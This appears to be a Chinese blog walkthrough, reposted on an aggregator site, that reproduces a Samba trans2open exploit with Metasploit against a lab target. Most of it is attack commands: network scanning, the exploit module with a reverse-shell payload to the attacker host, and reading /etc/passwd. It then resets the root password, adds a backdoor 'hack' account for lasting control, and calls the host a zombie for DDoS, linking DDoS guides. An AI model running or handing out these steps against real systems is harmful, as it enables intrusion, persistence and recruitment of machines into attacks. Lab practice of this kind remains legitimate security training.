IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> 基于Metasploit完成Samba服务漏洞复现 -> 正文阅读

[系统运维]基于Metasploit完成Samba服务漏洞复现

实验环境:

靶机ip:192.168.31.182(下载链接: https://pan.baidu.com/s/1ia-DD8UPDhIkWUd2eJWoKg?pwd=cykq 提取码: cykq 复制这段内容后打开百度网盘手机App,操作更方便哦)

攻击机ip:192.168.31.166(X64)

一:主机发现

arp-scan -l      #扫描同一网段下的主机

可以看到靶机的IP地址和mac地址,Vmware为虚拟机?

2.漏洞扫描

nmap  192.168.31.182  -p- -sV -sS -T4 -A         #扫描开放的端口和服务                                          

?可以看到存在samba服务漏洞

?靶机的操作系统为linux 2.4.X,属于较低版本

?确定Samba服务的版本号

msfconsole  
search smb_version
use auxiliary/scanner/smb/smb_version 
show options
set rhosts 192.168.31.182
run

?3.漏洞利用

search samba 2.2
exploit/linux/samba/trans2open       #   或者use2
show options 
set rhosts 192.168.31.182
set payload linux/x86/shell_reverse_tcp
set lport 5555       #更换端口号,如果默认4444端口号会报错出先下图错误,建议更换端口号为5555即可成功执行
run



?注意:如果出下面这种情况,更换本地监听主机的端口号

[-] Handler failed to bind to 192.168.31.166:4444:- ?-
[-] Handler failed to bind to 0.0.0.0:4444:- ?-
[-] 192.168.31.182:139 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).

?4.攻击成功

id
cat /etc/passwd

出现下面的截图说明靶机攻击成功,接下来就是植入后门账号

可以看到?拿到的是root权限,但是这个shell中的有些命令受限制,我们在把集中增加一个新的后门账户,进行长久控制靶机,使之成为肉鸡

passwd root     #修改root账号的密码,进行ssh登录
123456
123456          #重复输入两次密码

?

5.远程连接靶机

1.问题复现

使用具有最高权限的root账号进行ssh远程连接靶机,正常情况输入两次密码即可正常连接,但是报错

ssh root@192.168.31.182                                                  255 ?

ssh root@192.168.31.182 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?255 ?
Unable to negotiate with 192.168.31.182 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1

无法与192.168.31.182协商端口22:没有找到匹配的密钥交换方法。?他们的提议:diffie-hellman-group-exchange-sha1 diffie-hellman-group1-sha1 ?

2.报错截图

3.问题解决

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -oCiphers=+3des-cbc root@192.168.31.182

root为登录的用户名,192,。168.31.182为靶机ip地址

成功登录靶机

?6.在靶机中增加账号

useradd hack
passwd 
123456
123456

?

cat /etc/passwd

?可以看到新的后门账号添加成功,接下来用后门账号远程ssh连接靶机

?ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -oCiphers=+3des-cbc hack@192.168.31.182 ?     #用hack账号登录靶机

?7.利用肉鸡执行ddos攻击

附大佬博客

如何在Kali Linux上发动DDOS攻击 - 云+社区 - 腾讯云 (tencent.com)icon-default.png?t=M276https://cloud.tencent.com/developer/article/1199800

(63条消息) 利用kali进行DOS/DDOS攻击(局域网内)(DHCP原理 ARP原理)_Firebasky的博客-CSDN博客_kali攻击路由器瘫痪icon-default.png?t=M276https://blog.csdn.net/qq_46091464/article/details/105857350


?

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2022-03-11 22:36:33  更:2022-03-11 22:37:46 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/16 2:48:21-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码